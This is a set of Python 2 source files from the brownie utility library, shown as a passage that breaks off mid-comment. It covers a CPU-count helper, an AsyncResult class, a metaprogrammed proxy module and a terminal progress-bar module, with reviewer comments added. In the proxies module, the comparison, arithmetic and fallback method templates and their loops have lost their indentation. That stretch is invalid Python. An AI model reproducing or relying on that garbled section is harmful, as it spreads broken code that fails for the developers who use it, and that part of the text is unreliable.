from __future__ import with_statement
import os
import sys
from threading import Condition, Lock
try:
    # NOTE(review): `_get_cpu_count` is not a public multiprocessing API;
    # if the import fails the ImportError branch below is the fallback
    from multiprocessing import _get_cpu_count
    def get_cpu_count(default=None):
        try:
            return _get_cpu_count()
        except NotImplementedError:
            if default is None:
                raise
            return default
except ImportError:
    def get_cpu_count(default=None):
        if sys.platform == 'win32':
            try:
                return int(os.environ['NUMBER_OF_PROCESSORS'])
            except (ValueError, KeyError):
                # value could be anything or not existing
                pass
        # NOTE(review): sys.platform is e.g. 'freebsd8', never exactly
        # 'bsd' -- confirm whether BSDs should be matched by prefix
        if sys.platform in ('bsd', 'darwin'):
            try:
                return int(os.popen('sysctl -n hw.ncpu').read())
            except ValueError:
                # don't trust the outside world
                pass
        try:
            # POSIX systems expose the online processor count via sysconf
            cpu_count = os.sysconf('SC_NPROCESSORS_ONLN')
            if cpu_count >= 1:
                return cpu_count
        except (AttributeError, ValueError):
            # availability is restricted to unix
            pass
        if default is not None:
            return default
        raise NotImplementedError()
# shared docstring for whichever implementation was chosen above
get_cpu_count.__doc__ = """
Returns the number of available processors on this machine.
If default is ``None`` and the number cannot be determined a
:exc:`NotImplementedError` is raised.
"""
# Raised by AsyncResult.get() when no result arrives within the timeout.
class TimeoutError(Exception):
    """Exception raised in case of timeouts."""
class AsyncResult(object):
    """
    Helper object for providing asynchronous results.

    :param callback:
        Callback which is called if the result is a success.

    :param errback:
        Errback which is called if the result is an exception.
    """
    def __init__(self, callback=None, errback=None):
        self.callback = callback
        self.errback = errback
        self.condition = Condition(Lock())
        #: ``True`` if a result is available.
        self.ready = False
    def wait(self, timeout=None):
        """
        Blocks until the result is available or the given `timeout` has been
        reached.
        """
        with self.condition:
            if not self.ready:
                self.condition.wait(timeout)
    def get(self, timeout=None):
        """
        Returns the result or raises the exception which has been set, if
        the result is not available this method is blocking.

        If `timeout` is given this method raises a :exc:`TimeoutError`
        if the result is not available soon enough.
        """
        self.wait(timeout)
        if not self.ready:
            raise TimeoutError(timeout)
        # `value` and `success` are assigned together in set()
        if self.success:
            return self.value
        else:
            raise self.value
    def set(self, obj, success=True):
        """
        Sets the given `obj` as result, set `success` to ``False`` if `obj`
        is an exception.
        """
        self.value = obj
        self.success = success
        # callbacks run in the setting thread, before waiters are woken
        if self.callback and success:
            self.callback(obj)
        if self.errback and not success:
            self.errback(obj)
        with self.condition:
            self.ready = True
            # NOTE(review): notify() wakes a single waiter -- confirm
            # notify_all() is not needed when several threads wait
            self.condition.notify()
    def __repr__(self):
        parts = []
        if self.callback is not None:
            parts.append(('callback', self.callback))
        if self.errback is not None:
            parts.append(('errback', self.errback))
        return '%s(%s)' % (
            self.__class__.__name__,
            ', '.join('%s=%r' % part for part in parts)
        )
__all__ = ['get_cpu_count', 'TimeoutError', 'AsyncResult']
########NEW FILE########
__FILENAME__ = proxies
# coding: utf-8
"""
brownie.proxies
~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE for details
"""
import textwrap
from brownie.datastructures import missing
# special method name -> builtin that invokes it; these can be proxied by
# simply calling the builtin on the proxied object (see ProxyBase below)
SIMPLE_CONVERSION_METHODS = {
    '__str__': str,
    '__unicode__': unicode,
    '__complex__': complex,
    '__int__': int,
    '__long__': long,
    '__float__': float,
    '__oct__': oct,
    '__hex__': hex,
    '__nonzero__': bool
}
CONVERSION_METHODS = set(SIMPLE_CONVERSION_METHODS) | frozenset([
    '__index__',  # slicing, operator.index()
    '__coerce__',  # mixed-mode numeric arithmetic
])
# comparison method -> operator source text; used to generate stubs that
# evaluate `proxied <op> other` so __cmp__-only objects keep working
COMPARISON_METHODS = {
    '__lt__': '<',
    '__le__': '<=',
    '__eq__': '==',
    '__ne__': '!=',
    '__gt__': '>',
    '__ge__': '>='
}
DESCRIPTOR_METHODS = frozenset([
    '__get__',
    '__set__',
    '__delete__',
])
REGULAR_BINARY_ARITHMETIC_METHODS = frozenset([
    '__add__',
    '__sub__',
    '__mul__',
    '__div__',
    '__truediv__',
    '__floordiv__',
    '__mod__',
    '__divmod__',
    '__pow__',
    '__lshift__',
    '__rshift__',
    '__and__',
    '__xor__',
    '__or__',
])
# right-hand (reflected) variants of the binary operators above
REVERSED_ARITHMETIC_METHODS = frozenset([
    '__radd__',
    '__rsub__',
    '__rmul__',
    '__rdiv__',
    '__rtruediv__',
    '__rfloordiv__',
    '__rmod__',
    '__rdivmod__',
    '__rpow__',
    '__rlshift__',
    '__rrshift__',
    '__rand__',
    '__rxor__',
    '__ror__',
])
# In-place (augmented assignment) operator methods.  The previous literal
# had three defects: a missing comma fused '__itruediv__' and
# '__ifloordiv__' into the single bogus name '__itruediv____ifloordiv__',
# '__ipow__' was listed twice, and '__irshift__' was misspelled as
# '__rlshift__' (a *reflected* method that belongs to
# REVERSED_ARITHMETIC_METHODS above, where it is already listed).
AUGMENTED_ASSIGNMENT_METHODS = frozenset([
    '__iadd__',
    '__isub__',
    '__imul__',
    '__idiv__',
    '__itruediv__',
    '__ifloordiv__',
    '__imod__',
    '__ipow__',
    '__ilshift__',
    '__irshift__',
    '__iand__',
    '__ixor__',
    '__ior__',
])
# (sic: the 'ARITHMETHIC' misspelling is part of the existing public name)
BINARY_ARITHMETHIC_METHODS = (
    REGULAR_BINARY_ARITHMETIC_METHODS |
    REVERSED_ARITHMETIC_METHODS |
    AUGMENTED_ASSIGNMENT_METHODS
)
UNARY_ARITHMETHIC_METHODS = frozenset([
    '__neg__',  # -
    '__pos__',  # +
    '__abs__',  # abs()
    '__invert__'  # ~
])
# container method -> builtin that invokes it
SIMPLE_CONTAINER_METHODS = {
    '__len__': len,
    '__iter__': iter,
    '__reversed__': reversed
}
CONTAINER_METHODS = frozenset(SIMPLE_CONTAINER_METHODS) | frozenset([
    '__getitem__',  # ...[]
    '__setitem__',  # ...[] = ...
    '__delitem__',  # del ...[]
    '__contains__'  # ... in ...
])
# old-style slicing hooks (Python 2 only); stubbed explicitly in ProxyBase
SLICING_METHODS = frozenset([
    '__getslice__',
    '__setslice__',
    '__delslice__',
])
# Type checking hooks (PEP 3119).  The issubclass() hook is named
# __subclasscheck__; the previous entry '__issubclass__' is not a real
# special method and was never invoked by the interpreter.
TYPECHECK_METHODS = frozenset([
    '__instancecheck__',  # isinstance()
    '__subclasscheck__',  # issubclass()
])
CONTEXT_MANAGER_METHODS = frozenset([
    '__enter__',
    '__exit__'
])
UNGROUPABLE_METHODS = frozenset([
    # special comparison
    '__cmp__',  # cmp()
    # hashability, required if ==/!= are implemented
    '__hash__',  # hash()
    '__call__',  # ...()
])
#: All special methods with exception of :meth:`__new__` and :meth:`__init__`.
SPECIAL_METHODS = (
    CONVERSION_METHODS |
    set(COMPARISON_METHODS) |
    DESCRIPTOR_METHODS |
    BINARY_ARITHMETHIC_METHODS |
    UNARY_ARITHMETHIC_METHODS |
    CONTAINER_METHODS |
    SLICING_METHODS |
    TYPECHECK_METHODS |
    CONTEXT_MANAGER_METHODS |
    UNGROUPABLE_METHODS
)
# methods implementable by calling a single builtin on the proxied object;
# consumed by the `method_template` loop in ProxyBase below
SIMPLE_METHODS = {}
SIMPLE_METHODS.update(SIMPLE_CONVERSION_METHODS)
SIMPLE_METHODS.update(SIMPLE_CONTAINER_METHODS)
class ProxyMeta(type):
    # Metaclass for proxy classes: each method below installs a handler
    # under the private attribute name ProxyBase reads internally, so a
    # proxy subclass can override proxying behaviour declaratively.
    def _set_private(self, name, obj):
        private_name = '_ProxyBase__' + name
        setattr(self, private_name, obj)
    def method(self, handler):
        self._set_private('method_handler', handler)
    def getattr(self, handler):
        self._set_private('getattr_handler', handler)
    def setattr(self, handler):
        self._set_private('setattr_handler', handler)
    def repr(self, repr_handler):
        self._set_private('repr_handler', repr_handler)
class ProxyBase(object):
    def __init__(self, proxied):
        # stored under the mangled name '_ProxyBase__proxied', which
        # __getattribute__/__setattr__ below treat specially
        self.__proxied = proxied
    def __force(self, proxied):
        return self.__proxied
    def __method_handler(self, proxied, name, get_result, *args, **kwargs):
        # default handler: return the `missing` sentinel to signal
        # "not handled", letting the caller compute the real result
        return missing
    def __getattr_handler(self, proxied, name):
        return getattr(proxied, name)
    def __setattr_handler(self, proxied, name, obj):
        return setattr(proxied, name, obj)
    def __repr_handler(self, proxied):
        return repr(proxied)
    def __dir__(self):
        return dir(self.__proxied)
    def __getattribute__(self, name):
        # internal (name mangled) attributes bypass the proxy machinery,
        # everything else is delegated to the getattr handler
        if name.startswith('_ProxyBase__'):
            return object.__getattribute__(self, name)
        return self.__getattr_handler(self.__proxied, name)
    def __setattr__(self, name, obj):
        if name.startswith('_ProxyBase__'):
            return object.__setattr__(self, name, obj)
        return self.__setattr_handler(self.__proxied, name, obj)
    def __repr__(self):
        return self.__repr_handler(self.__proxied)
    # the special methods we implemented so far (for special cases)
    implemented = set()
    def __contains__(self, other):
        # `in` looks the method up on the type, bypassing __getattribute__,
        # hence the explicit stub
        def get_result(proxied, other):
            return other in proxied
        result = self.__method_handler(self.__proxied, '__contains__',
                                       get_result, other)
        if result is missing:
            return get_result(self.__proxied, other)
        return result
    implemented.add('__contains__')
    def __getslice__(self, i, j):
        # old-style slicing is looked up on the type as well
        def get_result(proxied, i, j):
            return proxied[i:j]
        result = self.__method_handler(self.__proxied, '__getslice__',
                                       get_result, i, j)
        if result is missing:
            return get_result(self.__proxied, i, j)
        return result
    implemented.add('__getslice__')
    def __setslice__(self, i, j, value):
        def get_result(proxied, i, j, value):
            # slice assignment has no result; returns None
            proxied[i:j] = value
        result = self.__method_handler(
            self.__proxied, '__setslice__', get_result, i, j, value
        )
        if result is missing:
            return get_result(self.__proxied, i, j, value)
        return result
    implemented.add('__setslice__')
    def __delslice__(self, i, j):
        def get_result(proxied, i, j):
            # slice deletion has no result; returns None
            del proxied[i:j]
        result = self.__method_handler(
            self.__proxied, '__delslice__', get_result, i, j
        )
        if result is missing:
            return get_result(self.__proxied, i, j)
        return result
    implemented.add('__delslice__')
    # simple methods such as __complex__ are not necessarily defined like
    # other special methods, especially for built-in types by using the
    # built-in functions we achieve the desired behaviour.
    method_template = textwrap.dedent("""
        def %(name)s(self):
            def get_result(proxied):
                return %(func)s(proxied)
            result = self._ProxyBase__method_handler(
                self._ProxyBase__proxied, '%(name)s', get_result
            )
            if result is missing:
                return get_result(self._ProxyBase__proxied)
            return result
    """)
    # the generated code is exec'd in the class body, so each def becomes
    # a method calling the corresponding builtin on the proxied object
    for method, function in SIMPLE_METHODS.items():
        exec(method_template % dict(name=method, func=function.__name__))
    implemented.update(SIMPLE_METHODS)
    # remove the loop variable from the class namespace
    del function
# we need to special case comparison methods due to the fact that
# if we implement __lt__ and call it on the proxied object it might fail
# because the proxied object implements __cmp__ instead.
method_template = textwrap.dedent("""
def %(name)s(self, other):
def get_result(proxied, other):
return proxied %(operator)s other
result = self._ProxyBase__method_handler(
self._ProxyBase__proxied, '%(name)s', get_result, other
)
if result is missing:
return get_result(self._ProxyBase__proxied, other)
return result
""")
for method, operator in COMPARISON_METHODS.items():
exec(method_template % dict(name=method, operator=operator))
implemented.update(COMPARISON_METHODS)
del operator
method_template = textwrap.dedent("""
def %(name)s(self, *args, **kwargs):
def get_result(proxied, *args, **kwargs):
other = args[0]
if type(self) is type(other):
other = other._ProxyBase__force(other._ProxyBase__proxied)
return proxied.%(name)s(
*((other, ) + args[1:]), **kwargs
)
result = self._ProxyBase__method_handler(
self._ProxyBase__proxied,
'%(name)s',
get_result,
*args,
**kwargs
)
if result is missing:
return get_result(self._ProxyBase__proxied, *args, **kwargs)
return result
""")
for method in BINARY_ARITHMETHIC_METHODS:
exec(method_template % dict(name=method))
implemented.update(BINARY_ARITHMETHIC_METHODS)
method_template = textwrap.dedent("""
def %(name)s(self, *args, **kwargs):
def get_result(proxied, *args, **kwargs):
return proxied.%(name)s(*args, **kwargs)
result = self._ProxyBase__method_handler(
self._ProxyBase__proxied, '%(name)s', get_result, *args, **kwargs
)
if result is missing:
return get_result(self._ProxyBase__proxied, *args, **kwargs)
return result
""")
for method in SPECIAL_METHODS - implemented:
method = method_template % dict(name=method)
exec(method)
del method_template, method, implemented
def as_proxy(cls):
    '''
    Class decorator which returns a proxy based on the handlers defined in the
    given class defined as methods::

        @as_proxy
        class MyProxy(object):
            """
            This is an example proxy, every method defined is optional.
            """

            def method(self, proxied, name, get_result, *args, **kwargs):
                """
                Gets called when a special method is called on the proxy

                :param proxied:
                    The object wrapped by the proxy.

                :param name:
                    The name of the called method.

                :param get_result:
                    A function which takes `proxied`, `*args` and `**kwargs`
                    as arguments and returns the appropriate result for the
                    called method.

                :param \*args:
                    The positional arguments passed to the method.

                :param \*\*kwargs:
                    The keyword arguments passed to the method.
                """
                return missing

            def getattr(self, proxied, name):
                """
                Gets called when a 'regular' attribute is accessed.

                :param name:
                    The name of the attribute.
                """
                return getattr(proxied, name)

            def setattr(self, proxied, name, obj):
                """
                Gets called when a 'regular' attribute is set.

                :param obj:
                    The object which is set as attribute.
                """
                setattr(proxied, name, obj)

            def force(self, proxied):
                """
                Returns a 'real' version of `proxied`. This is required when
                `proxied` is something abstract like a function which returns
                an object like which the proxy is supposed to behave.

                Internally this is used when a binary operator is used with the
                proxy on the left side. Built-in types complain if we call the
                special method with the proxy given on the right side of the
                operator, therefore the proxy on the right side is 'forced'.
                """
                return proxied

            def repr(self, proxied):
                """
                Gets called for the representation of the proxy.
                """
                return repr(proxied)

        foo = MyProxy(1)
    '''
    # Build the attribute dict for the generated proxy class; metadata is
    # copied from the handler class so docs/introspection stay useful.
    attributes = {
        '__module__': cls.__module__,
        '__doc__': cls.__doc__
    }
    # Public handler names map onto the name-mangled hooks ProxyBase uses.
    handler_name_mapping = {
        'method': '_ProxyBase__method_handler',
        'getattr': '_ProxyBase__getattr_handler',
        'setattr': '_ProxyBase__setattr_handler',
        'force': '_ProxyBase__force',
        'repr': '_ProxyBase__repr_handler'
    }
    # NOTE(review): `iteritems` and `im_func` are Python 2 only; `im_func`
    # extracts the plain function from the unbound method so it can be
    # re-bound on the new class.
    for name, internal_name in handler_name_mapping.iteritems():
        handler = getattr(cls, name, None)
        if handler is not None:
            attributes[internal_name] = handler.im_func
    return ProxyMeta(cls.__name__, (ProxyBase, ), attributes)
def get_wrapped(proxy):
    """
    Return the object hidden behind `proxy`, where `proxy` is an instance of
    a class produced by :func:`as_proxy`.
    """
    # The wrapped object is stored under the name-mangled ProxyBase slot.
    return getattr(proxy, '_ProxyBase__proxied')
class LazyProxy(object):
    """
    Wraps a callable which is invoked on every access to the proxy; the
    requested operation is then applied to whatever the callable returns::

        >>> from datetime import datetime
        >>> now = LazyProxy(datetime.utcnow)
        >>> now.second != now.second
        True
    """
    def method(self, proxied, name, get_result, *args, **kwargs):
        # Resolve the factory first, then perform the requested operation
        # on the freshly produced object.
        current = proxied()
        return get_result(current, *args, **kwargs)

    def getattr(self, proxied, name):
        current = proxied()
        return getattr(current, name)

    def setattr(self, proxied, name, attr):
        current = proxied()
        setattr(current, name, attr)

    def force(self, proxied):
        # 'Forcing' a lazy proxy simply means calling the factory.
        return proxied()

    def repr(self, proxied):
        return '%s(%r)' % (type(self).__name__, proxied)
# Replace the handler class with the actual proxy type built from it.
LazyProxy = as_proxy(LazyProxy)

# Public API of this module.
__all__ = ['as_proxy', 'get_wrapped', 'LazyProxy']
########NEW FILE########
__FILENAME__ = progress
# coding: utf-8
"""
brownie.terminal.progress
~~~~~~~~~~~~~~~~~~~~~~~~~
A widget-based progress bar implementation.
.. versionadded:: 0.6
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import division
import re
import math
from functools import wraps
from datetime import datetime
from brownie.caching import LFUCache
from brownie.datastructures import ImmutableDict
#: Binary prefixes, largest first.
BINARY_PREFIXES = [
    (u'Yi', 2 ** 80),  # yobi
    (u'Zi', 2 ** 70),  # zebi
    (u'Ei', 2 ** 60),  # exbi
    (u'Pi', 2 ** 50),  # pebi
    (u'Ti', 2 ** 40),  # tebi
    (u'Gi', 2 ** 30),  # gibi
    (u'Mi', 2 ** 20),  # mebi
    (u'Ki', 2 ** 10)   # kibi
]

#: Positive SI prefixes, largest first.
SI_PREFIXES = [
    (u'Y', 10 ** 24),  # yotta
    (u'Z', 10 ** 21),  # zetta
    (u'E', 10 ** 18),  # exa
    (u'P', 10 ** 15),  # peta
    (u'T', 10 ** 12),  # tera
    (u'G', 10 ** 9),   # giga
    (u'M', 10 ** 6),   # mega
    (u'k', 10 ** 3)    # kilo
]
# Tokenizer for progress bar format strings: matches either a widget
# reference ($name, optionally with an initial value) or an escaped '$$'.
# NOTE(review): the `ur""` prefix is Python 2-only syntax.
_progressbar_re = re.compile(ur"""
    (?<!\$)\$([a-zA-Z]+) # identifier
    (: # initial widget value
        (?: # grouping to avoid : to be treated as part of
            # the left or operand
            "( # quoted string
                (?:
                    [^"]| # any character except " or ...
                    (?<=\\)" # ... " preceded by a backslash
                )*
            )"|
            ([a-zA-Z]+) # identifiers can be used instead of strings
        )
    )?|
    (\$\$) # escaped $
""", re.VERBOSE)
def count_digits(n):
    """
    Return the number of characters needed to display the number `n`,
    including one extra character for the sign of negative numbers.
    """
    if n == 0:
        return 1
    # One character per digit plus one more for the '-' sign if negative.
    sign_width = 2 if n < 0 else 1
    return int(math.log10(abs(n)) + sign_width)
def bytes_to_readable_format(bytes, binary=True):
    # Walk the prefixes from largest to smallest and scale by the first one
    # that fits; anything below the smallest prefix is reported as plain 'B'.
    prefixes = BINARY_PREFIXES if binary else SI_PREFIXES
    for prefix, size in prefixes:
        if bytes >= size:
            return bytes / size, prefix + 'B'
    return bytes, 'B'

def bytes_to_string(bytes, binary=True):
    """
    Provides a nice readable string representation for `bytes`.

    :param binary:
        If ``True`` uses binary prefixes otherwise SI prefixes are used.
    """
    result, prefix = bytes_to_readable_format(bytes, binary=binary)
    # Whole quantities are shown without a fractional part; floats expose
    # is_integer(), ints are whole by definition.
    is_whole = isinstance(result, int) or getattr(result, 'is_integer', lambda: False)()
    if is_whole:
        return '%i%s' % (result, prefix)
    return '%.02f%s' % (result, prefix)
@LFUCache.decorate(maxsize=64)
def parse_progressbar(string):
    """
    Parses a string representing a progress bar.

    Returns a list of ``[widget_name, initial_value]`` pairs; runs of
    literal characters are collected into ``['text', ...]`` tokens.
    """
    def add_text(text):
        # Merge consecutive literal characters into a single text token.
        if not rv or rv[-1][0] != 'text':
            rv.append(['text', text])
        else:
            rv[-1][1] += text
    rv = []
    remaining = string
    while remaining:
        match = _progressbar_re.match(remaining)
        if match is None:
            # No widget or escape at this position: consume one literal char.
            add_text(remaining[0])
            remaining = remaining[1:]
        elif match.group(5):
            # '$$' is an escaped dollar sign.
            add_text(u'$')
            remaining = remaining[match.end():]
        else:
            # Widget reference with an optional initial value: either a bare
            # identifier (group 4) or a quoted string (group 3).
            if match.group(3) is None:
                value = match.group(4)
            else:
                # NOTE(review): 'string-escape' is a Python 2-only codec.
                value = match.group(3).decode('string-escape')
            rv.append([match.group(1), value])
            remaining = remaining[match.end():]
    return rv
class Widget(object):
    """
    Represents a part of a progress bar.
    """
    #: The priority of the widget defines in which order they are updated. The
    #: default priority is 0.
    #:
    #: This is important as the first widget being updated has the entire
    #: line available.
    priority = 0

    #: Should be ``True`` if this widget depends on
    #: :attr:`ProgressBar.maxsteps` being set to something other than ``None``.
    requires_fixed_size = False

    @property
    def provides_size_hint(self):
        # True when a subclass overrides size_hint; compares the underlying
        # plain functions of the unbound methods.
        # NOTE(review): `im_func` exists on Python 2 only.
        return self.size_hint.im_func is not Widget.size_hint.im_func

    def size_hint(self, progressbar):
        """
        Should return the required size or ``None`` if it cannot be given.
        """
        return None

    def init(self, progressbar, remaining_width, **kwargs):
        """
        Called when the progress bar is initialized.

        Should return the output of the widget as string.
        """
        raise NotImplementedError('%s.init' % self.__class__.__name__)

    def update(self, progressbar, remaining_width, **kwargs):
        """
        Called when the progress bar is updated, not necessarily with each
        step.

        Should return the output of the widget as string.
        """
        raise NotImplementedError('%s.update' % self.__class__.__name__)

    def finish(self, progressbar, remaining_width, **kwargs):
        """
        Called when the progress bar is finished, not necessarily after
        maxsteps has been reached, per default this calls :meth:`update`.

        Should return the output of the widget as string.
        """
        return self.update(progressbar, remaining_width, **kwargs)

    def __repr__(self):
        return '%s()' % self.__class__.__name__
class TextWidget(Widget):
    """
    A widget rendering a fixed piece of text in the progress bar.
    """
    def __init__(self, text):
        self.text = text

    def size_hint(self, progressbar):
        # Static text always occupies exactly its own length.
        return len(self.text)

    def update(self, progressbar, remaining_width, **kwargs):
        return self.text

    # Initial rendering is identical to any later rendering.
    init = update

    def __repr__(self):
        return '%s(%r)' % (type(self).__name__, self.text)
class HintWidget(Widget):
    """
    Represents a 'hint', changing text passed with each update, in a progress
    bar.

    Requires that :meth:`ProgressBar.next` is called with a `hint` keyword
    argument.

    This widget has a priority of 1.
    """
    priority = 1

    def __init__(self, initial_hint=u''):
        self.initial_hint = initial_hint

    def init(self, progressbar, remaining_width, **kwargs):
        # The very first rendering shows the hint given at construction.
        return self.initial_hint

    def update(self, progressbar, remaining_width, **kwargs):
        # BUG FIX: the previous implementation used kwargs.get('hint', u''),
        # which can never raise KeyError, so the documented TypeError for a
        # missing 'hint' argument was unreachable dead code. Index the
        # mapping directly so the documented contract is actually enforced.
        try:
            return kwargs['hint']
        except KeyError:
            raise TypeError("expected 'hint' as a keyword argument")

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self.initial_hint)
class PercentageWidget(Widget):
    """
    Displays the progress made as a percentage of ``maxsteps``.
    """
    requires_fixed_size = True

    def calculate_percentage(self, progressbar):
        # With true division (enabled module-wide) this yields a float.
        return 100 / progressbar.maxsteps * progressbar.step

    def size_hint(self, progressbar):
        percentage = self.calculate_percentage(progressbar)
        # One extra character for the trailing '%' sign.
        return count_digits(percentage) + 1

    def init(self, progressbar, remaining_width, **kwargs):
        return '0%'

    def update(self, progressbar, remaining_width, **kwargs):
        return '%i%%' % self.calculate_percentage(progressbar)

    def finish(self, progressbar, remaining_width, **kwargs):
        return '100%'
class BarWidget(Widget):
    """
    A bar whose marker bounces back and forth with each update; its motion
    does not correspond to the progress actually being made.

    The bar is enclosed in brackets, the moving marker consists of three
    hashes `###`, every other cell is drawn as a dot `.`.
    """
    def __init__(self):
        self.position = 0
        self.going_forward = True

    def make_bar(self, width):
        # The interior has width - 2 cells (the brackets take two); the
        # marker overwrites three of them starting at the current position.
        cells = ['.'] * (width - 2)
        cells[self.position:self.position + 3] = '###'
        return '[%s]' % ''.join(cells)

    def init(self, progressbar, remaining_width, **kwargs):
        return self.make_bar(remaining_width)

    def update(self, progressbar, remaining_width, **kwargs):
        interior = remaining_width - 2
        if self.position + 3 > interior:
            # Marker no longer fits (e.g. the available width shrank):
            # clamp it near the right edge and reverse direction.
            self.position = interior - 4
            self.going_forward = False
        elif self.going_forward:
            self.position += 1
            # Turn around once the marker touches the right edge.
            self.going_forward = self.position + 3 != interior
        else:
            self.position -= 1
            # Turn around once the marker is back at the left edge.
            self.going_forward = self.position == 0
        return self.make_bar(remaining_width)
class PercentageBarWidget(Widget):
    """
    A bar which fills up proportionally to the percentage of progress made.

    The bar is enclosed in brackets, completed progress is drawn with hashes
    `#`, the remaining part with dots `.`.
    """
    requires_fixed_size = True

    def init(self, progressbar, remaining_width, **kwargs):
        # Nothing done yet: interior is all dots.
        return '[%s]' % ('.' * (remaining_width - 2))

    def update(self, progressbar, remaining_width, **kwargs):
        interior = remaining_width - 2
        percentage = 100 / progressbar.maxsteps * progressbar.step
        filled = int(percentage * interior / 100)
        return '[%s]' % ('#' * filled).ljust(interior, '.')

    def finish(self, progressbar, remaining_width, **kwargs):
        # Finishing always renders a completely filled bar.
        return '[%s]' % ('#' * (remaining_width - 2))
class StepWidget(Widget):
    """
    Shows the current step and the total number of steps as `step of steps`.

    :param unit:
        If each step represents something other than a simple task e.g. a byte
        when doing file transactions, you can specify a unit which is used.

        Supported units:

        - `'bytes'` - binary prefix only, SI might be added in the future
    """
    requires_fixed_size = True

    #: Maps unit names to the converter used to render step values.
    units = ImmutableDict({
        'bytes': bytes_to_string,
        None: unicode
    })

    def __init__(self, unit=None):
        if unit not in self.units:
            raise ValueError('unknown unit: %s' % unit)
        self.unit = unit

    def get_values(self, progressbar):
        # Render both the current and the total step with the same converter.
        convert = self.units[self.unit]
        return convert(progressbar.step), convert(progressbar.maxsteps)

    def size_hint(self, progressbar):
        step, maxsteps = self.get_values(progressbar)
        # Four extra characters for the ' of ' separator.
        return len(step) + len(maxsteps) + 4

    def init(self, progressbar, remaining_width, **kwargs):
        return u'%s of %s' % self.get_values(progressbar)

    # Updating renders exactly the same way as initializing.
    update = init
class TimeWidget(Widget):
    """
    Shows the elapsed time in hours, minutes and seconds as
    ``$hours:$minutes:$seconds``.

    This widget has a priority of 2.
    """
    priority = 2

    def init(self, progressbar, remaining_width, **kwargs):
        # Timing starts when the progress bar is first drawn.
        self.start_time = datetime.now()
        return '00:00:00'

    def update(self, progressbar, remaining_width, **kwargs):
        # BUG FIX: the previous implementation split the elapsed time with
        # `if seconds > hour` / `if seconds > minute`, so exact multiples
        # were not carried over: 3600s rendered as '00:60:00' and 60s as
        # '00:00:60'. Unconditional divmod handles all boundaries correctly
        # and is equivalent for every other value.
        seconds = (datetime.now() - self.start_time).seconds
        minutes, seconds = divmod(seconds, 60)
        hours, minutes = divmod(minutes, 60)
        return '%02i:%02i:%02i' % (hours, minutes, seconds)
class DataTransferSpeedWidget(Widget):
    """
    Shows the data transfer speed in bytes per second using SI prefixes.

    This widget has a priority of 2.
    """
    priority = 2

    def init(self, progressbar, remaining_width, **kwargs):
        self.begin_timing = datetime.now()
        self.last_step = 0
        return '0kb/s'

    def update(self, progressbar, remaining_width, **kwargs):
        end_timing = datetime.now()
        # BUG FIX: `.microseconds` only holds the sub-second component of a
        # timedelta (0-999999), so any update interval of one second or more
        # had its whole seconds silently dropped, yielding wildly inflated
        # speeds. Compute the full duration in seconds instead (equivalent
        # to timedelta.total_seconds(), spelled out for Python < 2.7).
        delta = end_timing - self.begin_timing
        elapsed = delta.days * 86400 + delta.seconds + delta.microseconds * 10 ** -6
        step = progressbar.step - self.last_step
        if elapsed == 0:
            # Avoid a ZeroDivisionError for back-to-back updates.
            result = '%.02f%s/s' % bytes_to_readable_format(0, binary=False)
        else:
            result = '%.02f%s/s' % bytes_to_readable_format(
                step / elapsed,
                binary=False
            )
        # Remember where this interval ended so the next update measures
        # only the work done since now.
        self.begin_timing = end_timing
        self.last_step = progressbar.step
        return result
class ProgressBar(object):
    """
    A progress bar which acts as a container for various widgets which may be
    part of a progress bar.

    Initializing and finishing can be done by using the progress bar as a
    context manager instead of calling :meth:`init` and :meth:`finish`.

    :param widgets:
        An iterable of widgets which should be used.

    :param writer:
        A :class:`~brownie.terminal.TerminalWriter` which is used by the
        progress bar.

    :param maxsteps:
        The number of steps, not necessarily updates, which are to be made.
    """
    @classmethod
    def from_string(cls, string, writer, maxsteps=None, widgets=None):
        """
        Returns a :class:`ProgressBar` from a string.

        The string is used as a progressbar, ``$[a-zA-Z]+`` is substituted with
        a widget as defined by `widgets`.

        ``$`` can be escaped with another ``$`` e.g. ``$$foo`` will not be
        substituted.

        Initial values as required for the :class:`HintWidget` are given like
        this ``$hint:initial``, if the initial value is supposed to contain a
        space you have to use a quoted string ``$hint:"foo bar"``; quoted can
        be escaped using a backslash.

        If you want to provide your own widgets or overwrite existing ones
        pass a dictionary mapping the desired names to the widget classes to
        this method using the `widgets` keyword argument. The default widgets
        are:

        +--------------+----------------------------------+-------------------+
        | Name         | Class                            | Requires maxsteps |
        +==============+==================================+===================+
        | `text`       | :class:`TextWidget`              | No                |
        +--------------+----------------------------------+-------------------+
        | `hint`       | :class:`HintWidget`              | No                |
        +--------------+----------------------------------+-------------------+
        | `percentage` | :class:`Percentage`              | Yes               |
        +--------------+----------------------------------+-------------------+
        | `bar`        | :class:`BarWidget`               | No                |
        +--------------+----------------------------------+-------------------+
        | `sizedbar`   | :class:`PercentageBarWidget`     | Yes               |
        +--------------+----------------------------------+-------------------+
        | `step`       | :class:`StepWidget`              | Yes               |
        +--------------+----------------------------------+-------------------+
        | `time`       | :class:`TimeWidget`              | No                |
        +--------------+----------------------------------+-------------------+
        | `speed`      | :class:`DataTransferSpeedWidget` | No                |
        +--------------+----------------------------------+-------------------+
        """
        default_widgets = {
            'text': TextWidget,
            'hint': HintWidget,
            'percentage': PercentageWidget,
            'bar': BarWidget,
            'sizedbar': PercentageBarWidget,
            'step': StepWidget,
            'time': TimeWidget,
            'speed': DataTransferSpeedWidget
        }
        # User-supplied widgets extend/override the defaults.
        widgets = dict(default_widgets.copy(), **(widgets or {}))
        rv = []
        for name, initial in parse_progressbar(string):
            if name not in widgets:
                raise ValueError('widget not found: %s' % name)
            # Widgets taking an initial value (e.g. text or hint) receive it
            # as their only constructor argument.
            if initial:
                widget = widgets[name](initial)
            else:
                widget = widgets[name]()
            rv.append(widget)
        return cls(rv, writer, maxsteps=maxsteps)

    def __init__(self, widgets, writer, maxsteps=None):
        widgets = list(widgets)
        if maxsteps is None:
            # Fail early: some widgets cannot work without a known total.
            for widget in widgets:
                if widget.requires_fixed_size:
                    raise ValueError(
                        '%r requires maxsteps to be given' % widget
                    )
        self.widgets = widgets
        self.writer = writer
        self.maxsteps = maxsteps
        self.step = 0

    def get_step(self):
        return self._step

    def set_step(self, new_step):
        # The current step may never exceed maxsteps (when one is known).
        if self.maxsteps is None or new_step <= self.maxsteps:
            self._step = new_step
        else:
            raise ValueError('step cannot be larger than maxsteps')

    # Validated access to the current step; the plain accessor functions are
